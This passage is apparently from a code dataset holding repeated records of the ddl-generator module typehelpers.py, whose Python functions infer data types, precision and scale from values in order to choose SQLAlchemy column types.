frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | worst_decimal | python | def worst_decimal(d1, d2):
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after)) | Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999') | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L122-L132 | [
"def _places_b4_and_after_decimal(d):\n \"\"\"\n >>> _places_b4_and_after_decimal(Decimal('54.212'))\n (2, 3)\n \"\"\"\n tup = d.as_tuple()\n return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))\n"
] | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | set_worst | python | def set_worst(old_worst, new_worst):
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst | Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20 | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L134-L170 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | best_representative | python | def best_representative(d1, d2):
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst | Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9') | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L172-L213 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
"""
Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything'
"""
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst
def sqla_datatype_for(datum):
"""
Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14)
"""
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | best_coercable | python | def best_coercable(data):
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for datum in data:
coerced = coerce_to_specific(datum)
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = coerced
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = worst_decimal(coerced, worst)
elif isinstance(coerced, float):
worst = max(coerced, worst)
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = coerced
return worst | Given an iterable of scalar data, returns the datum representing the most specific
data type the list overall can be coerced into, preferring datetimes, then bools,
then integers, then decimals, then floats, then strings.
>>> best_coercable((6, '2', 9))
6
>>> best_coercable((Decimal('6.1'), 2, 9))
Decimal('6.1')
>>> best_coercable(('2014 jun 7', '2011 may 2'))
datetime.datetime(2014, 6, 7, 0, 0)
